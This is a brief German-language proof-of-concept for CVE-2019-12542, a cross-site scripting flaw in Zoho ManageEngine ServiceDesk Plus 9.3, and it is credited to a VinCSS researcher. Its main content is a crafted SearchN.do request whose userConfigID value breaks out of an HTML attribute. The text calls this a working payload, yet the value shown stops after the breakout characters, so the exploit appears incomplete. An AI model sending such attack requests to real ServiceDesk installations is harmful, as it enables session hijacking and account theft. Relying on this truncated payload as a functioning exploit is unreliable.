
Proof-of-Concept für CVE-2019-12542: XSS-Schwachstelle in Zoho ManageEngine ServiceDesk Plus 9.3 über den Parameter userConfigID in SearchN.do, mit einem funktionierenden Payload.
Information Beschreibung: Es wurde ein Problem in Zoho ManageEngine ServiceDesk Plus 9.3 entdeckt. Es gibt eine XSS-Sicherheitslücke über den Parameter userConfigID in SearchN.do.
Autor: Concobe vom Tarantula Team - VinCSS (ein Mitglied von Vingroup)
domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=1">&selectName=Site